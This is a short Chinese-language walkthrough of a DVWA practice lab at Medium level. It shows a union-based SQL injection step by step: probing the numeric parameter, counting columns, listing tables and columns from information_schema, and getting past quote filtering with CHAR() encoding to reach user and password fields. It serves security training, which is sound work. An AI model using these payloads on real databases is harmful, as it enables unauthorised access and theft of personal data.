此次实战模拟的靶场为DVWA,将等级调为Medium
Medium
这是由POST传值传输数据
用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点
判断类型
输入1 and 0#
,无返回值,则是数字型
判断显示位
从order by 1#
输入到 order by 3#
开始报错,则显示位只有2位
查看显示位
输入-1 union select 1,2#
,看看1,2会出现在哪个位置
查表
输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到guestbook,users,world三张表
查字段名
输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
发现引号被过滤了,那我们将其char编码,在这里输入users,得到CHAR(117, 115, 101, 114, 115)
得到字段名:id,login,password,email,secret,activation_code,activated,reset_code,admin,user_id,first_name,last_name,user,password,avatar,last_login,failed_login,yinhangka,phone,shenfenzheng,id,username,password,level,id,username,card
查字段
这里取first_name,password查询